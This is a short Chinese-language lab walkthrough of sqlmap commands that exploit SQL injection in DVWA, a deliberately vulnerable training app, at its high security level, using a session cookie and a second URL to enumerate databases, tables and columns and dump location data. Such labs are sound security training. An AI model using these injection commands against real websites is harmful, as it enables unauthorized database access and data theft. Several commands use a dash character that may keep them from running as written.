在high安全级别下,我们能够看到进行了一次页面跳转
使用cookie插件获取cookie信息
--cookie="4a80203698ca9007ed3373a065349ddd;security=high"
此时用户提交网站为10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php
-u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php"
实际要注入的网站为http://10.12.202.4/dvwa/vulnerabilities/sqli/
--second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/"
用户提交的数据为
--data="id=1&Submit=Submit"
构造完成,尝试列出所有数据库(–batch全自动,不会要求输入y/n)
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" --dbs --batch
查看目前数据库
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –current-db --batch
查看当前数据库下所有表名
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –tables -D "dvwa" --batch
发现locations
列出此表所有字段
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –columns -T "locations" -D "dvwa" --batch
获得维度
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa" -C "latitude" --batch
获得经度
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa" -C "longtitude" --batch
获得建筑名称
sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa" -C "name" --batch